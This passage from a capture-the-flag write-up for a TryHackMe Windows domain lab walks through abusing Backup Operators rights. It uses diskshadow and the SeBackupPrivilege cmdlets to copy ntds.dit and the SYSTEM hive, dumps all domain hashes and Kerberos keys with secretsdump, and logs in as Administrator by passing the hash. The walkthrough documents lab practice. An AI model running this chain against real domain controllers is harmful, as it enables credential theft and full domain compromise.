The only difference vs the same information on Ljudmila is that xyan1d3 is also a member of the Backup Operators group. Some googling finds us some info on how this might get us elevated privileges
For your information, a member of the Backup operators group can:
Can back up and restore files regardless of the permissions that protect those files
Can back up system state
Can interactively logon (RDP excluded) on all servers (including DC)
Can logon to shutdown a server
A little more searching finds us a handy guide to a number of Windows exploits, including how to abuse the Backup Operators group
First we make a script and transfer it to the target
*Evil-WinRM* PS C:\Users\xyan1d3> type script.txt
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
And now we execute that script to make a backup
*Evil-WinRM* PS C:\Users\xyan1d3> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: HAVEN-DC, 7/22/2021 8:43:42 AM
-> set context persistent nowriters
-> set metadata c:\windows\system32\spool\drivers\color\example.cab
-> set verbose on
-> begin backup
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {9b012e1a-01a0-4687-aea0-26e348b9d3fc} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {45bbf34b-0e51-41a7-a6e4-e806fb991406} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis2834.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {45bbf34b-0e51-41a7-a6e4-e806fb991406}
* Shadow copy ID = {9b012e1a-01a0-4687-aea0-26e348b9d3fc} %mydrive%
- Shadow copy set: {45bbf34b-0e51-41a7-a6e4-e806fb991406} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{115c1f55-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 7/22/2021 8:43:46 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: HAVEN-DC.raz0rblack.thm
- Service machine: HAVEN-DC.raz0rblack.thm
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %mydrive% w:
-> %mydrive% = {9b012e1a-01a0-4687-aea0-26e348b9d3fc}
The shadow copy was successfully exposed as w:\.
-> end backup
->
Ok, so far so good it seems!
Next we want to clone the repo mentioned and transfer the dlls to the target. With this done we continue
*Evil-WinRM* PS C:\Users\xyan1d3> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\xyan1d3> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\xyan1d3> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\xyan1d3> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\xyan1d3> Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\xyan1d3\ntds.dit -Overwrite
*Evil-WinRM* PS C:\Users\xyan1d3> reg save HKLM\SYSTEM c:\users\xyan1d3\system
.hive
The operation completed successfully.
Everything seems to have gone exactly as described, let’s check if we have the files we expect
*Evil-WinRM* PS C:\Users\xyan1d3> dir
Directory: C:\Users\xyan1d3
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 9:34 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 7/22/2021 8:50 AM 16777216 ntds.dit
-a---- 7/22/2021 8:43 AM 216 script.txt
-a---- 7/22/2021 8:48 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 7/22/2021 8:48 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 7/22/2021 8:50 AM 17219584 system.hive
-a---- 2/25/2021 9:33 AM 1826 xyan1d3.xml
And we do! Now we want to transfer them back to our attack box and see if we can harvest some creds. Luckily evil-winrm has a built-in download function for this, so we transfer the files and then head back to impacket tool’s secretsdump again
rob:RazorBlack/ $ impacket-secretsdump -system system.hive -ntds ntds.dit -outputfile morehashes.hash LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xf1582a79dd00631b701d3d15e75e59f6
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f6162bb347993035d66a15417d73a667
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:26cc019045071ea8ad315bd764c4f5c6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa3c456268854a917bd17184c85b4fd1:::
raz0rblack.thm\xyan1d3:1106:aad3b435b51404eeaad3b435b51404ee:bf11a3cbefb46f7194da2fa190834025:::
raz0rblack.thm\lvetrova:1107:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::
raz0rblack.thm\sbradley:1108:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
raz0rblack.thm\twilliams:1109:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ab77c0dd6f5a28b63c4ae5f0eb89ad48f3ed43d52dc42f1dca2e99d8fc9cdbbf
Administrator:aes128-cts-hmac-sha1-96:81a749369e929b7f1731489b12a49df8
Administrator:des-cbc-md5:d3b646b65bceb5c7
HAVEN-DC$:aes256-cts-hmac-sha1-96:d6b41169e02a4543b90a8c697b167948413397c30f1bf5f0199a54f387358fc6
HAVEN-DC$:aes128-cts-hmac-sha1-96:5ed5bd57484ca826e09afa6e5b944c27
HAVEN-DC$:des-cbc-md5:f71a0dc89b9d079d
krbtgt:aes256-cts-hmac-sha1-96:eed4acbdf1b6cc2b3c1aef992a8cea74d8b0c4ad5b4deecf47c57c4d9465caf5
krbtgt:aes128-cts-hmac-sha1-96:3dbbd202aa0343d1b8df99785d2befbb
krbtgt:des-cbc-md5:857a46f13e91eae3
raz0rblack.thm\xyan1d3:aes256-cts-hmac-sha1-96:6de380d21ae165f55e7520ee3c4a81417bf6a25b17f72ce119083846d89a031f
raz0rblack.thm\xyan1d3:aes128-cts-hmac-sha1-96:9f5a0114b2c18ea63a32a1b8553d4f61
raz0rblack.thm\xyan1d3:des-cbc-md5:e9a1a46223cd8975
raz0rblack.thm\lvetrova:aes256-cts-hmac-sha1-96:3809e38e24ecb746dc0d98e2b95f39fc157de38a9081b3973db5be4c25d5ad39
raz0rblack.thm\lvetrova:aes128-cts-hmac-sha1-96:3676941361afe1800b8ab5d5a15bd839
raz0rblack.thm\lvetrova:des-cbc-md5:385d6e1f1cc17fb6
raz0rblack.thm\sbradley:aes256-cts-hmac-sha1-96:ddd43169c2235d3d2134fdb2ff4182abdb029a20724e679189a755014e68bab5
raz0rblack.thm\sbradley:aes128-cts-hmac-sha1-96:7cdf6640a975c86298b9f48000047580
raz0rblack.thm\sbradley:des-cbc-md5:83fe3e584f4a5bf8
raz0rblack.thm\twilliams:aes256-cts-hmac-sha1-96:05bac51a4b8888a484e0fa1400d8f507b195c4367198024c6806d8eb401cb559
raz0rblack.thm\twilliams:aes128-cts-hmac-sha1-96:a37656829f443e3fe2630aa69af5cb5a
raz0rblack.thm\twilliams:des-cbc-md5:01e958b0ea6edf07
[*] Cleaning up...
Now we’ve found the Administrator’s hash. We can try to crack it but with no success, but we don’t need it cracked necessarily as we can always login by passing the hash instead
rob:evil-winrm/ (master) $ ./evil-winrm.rb -i 10.10.94.232 -u administrator -H 9689931bed40ca5a2ce1218210177f0c
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Administrator
We can now have a look at those files, first the cookie.json
*Evil-WinRM* PS C:\Users\Administrator> type cookie.json
{
auth : "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU="
}
That looks like a base64 string, let’s try decoding it
rob:RazorBlack/ $ echo "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU=" | base64 -d
Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.
And stop putting 'OR '1'='1 inside login.php
Enjoy your Cookie
Ok, just random thoughts or something relevant? Let’s carry on for now and look at the root.xml file. Assuming it’s the same format let’s use our previous method again
*Evil-WinRM* PS C:\Users\Administrator> $credential = Import-CliXml -Path 'root.xml'
The data is invalid.
At line:1 char:15
+ $credential = Import-CliXml -Path 'root.xml'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Import-Clixml], CryptographicException
+ FullyQualifiedErrorId : System.Security.Cryptography.CryptographicException,Microsoft.PowerShell.Commands.ImportClixmlCommand
Ahh, of course, that would be too easy! 😄
Looking at the contents though it seems a little familiar…
That looks a lot like plain ascii! And sure enough if we convert from hex we get a message
Damn you are a genius.
But, I apologize for cheating you like this.
Here is your Root Flag
`REDACTED`
Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.
If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.
And we have the root flag in there, #8: REDACTED
Tyson
So finally now let’s go and look in Tyson Williams (twilliams) home folder
*Evil-WinRM* PS C:\users\twilliams> dir
Directory: C:\users\twilliams
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:18 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:20 AM 80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_de
finitely_definitely_not_a_flag.exe
Ok then, that is obviously definitely not a flag! Let’s maybe check anyway…
The file seems very small to be an executable, let’s see if we can look at the contents
*Evil-WinRM* PS C:\users\twilliams> type definitely*
`REDACTED`
And we got the final flag, #9: REDACTED
Top Secret
Some enumeration finds us an image file in c:\program files\top secret
This gives us the final flag, #10: REDACTED 😄 Vim for the win!